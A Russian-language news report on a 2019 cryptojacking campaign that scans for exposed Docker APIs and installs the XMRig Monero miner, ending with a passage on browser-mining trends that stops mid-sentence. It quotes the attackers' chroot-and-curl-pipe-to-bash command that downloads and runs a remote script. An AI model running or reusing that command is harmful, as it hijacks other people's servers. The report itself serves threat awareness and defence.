Группа хакеров запустила масштабную кампанию по поиску Docker-контейнеров с открытыми конечными точками API для последующей установки на них майнера криптовалюты Monero (XMR). Проблема была обнаружена специалистами по кибербезопасности из компании Bad Packets LLC.
Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.
These scans create a container using an Alpine Linux image, and execute the payload via:
«Command»: «chroot /mnt /bin/sh -c ‘curl -sL4 https://t.co/q047bRPUyj | bash;’»,#threatintel pic.twitter.com/vxszV5SF1o— Bad Packets Report (@bad_packets) November 25, 2019
Docker представляет собой систему развертывания приложений, с поддержкой контейнеризации. Приложение со всем окружением можно упаковать в контейнер, которым легко и просто управлять: переносить на другой сервер, масштабировать или обновлять.
В настоящее время хакеры просканировали более 59 000 IP-сетей. После обнаружения уязвимого хоста злоумышленники используют конечную точку API для запуска контейнера ОС Alpine Linux и загрузки скрипта Bash:
chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;
Этот скрипт устанавливает классический майнер криптовалюты XMRRig. За два дня хакеры добыли 14,82 XMR (около $815 на момент публикации).
Специалисты Bad Packets LLC рекомендуют пользователям Docker проверять, выставляют ли они свои конечные точки API в интернете, закрывать порты и завершать работу нераспознанных запущенных контейнеров.
Напомним, в октябре через образы контейнеров Docker из открытого депозитария Docker Hub распространялся червь, заразивший 2000 машин программой для скрытого майнинга Monero.
Источник: forklog.com
Между активностью попыток заражения браузеров скрытыми майнерами и стоимостью криптовалют, например, Bitcoin и Monero, действительно прослеживаются интересные параллели. Очевидно, что киберпреступники планируют свою деятельность с учетом популярности и курсов этих цифровых активов. За последние несколько месяцев число атак снизилось — как и стоимость большинства криптовалют. В сентябре 2019 года было зафиксированно усиление этой активности. Скорее всего, злоумышленники рассчитывают на взрывное подорожание криптовалют, какое было в 2017 году. Одна из причин, по которой киберпреступники усиливают атаки в период роста курсов криптовалют, заключается в том, что они тоже несут расходы. Им необходимо поддерживать собственные сайты, совершенствовать алгоритмы заражения других ресурсов, а также обслуживать командные серверы . Именно поэтому майнинг прибылен только в определенные периоды времени — например, при высоком курсе криптовалют по отношению к обычному курсу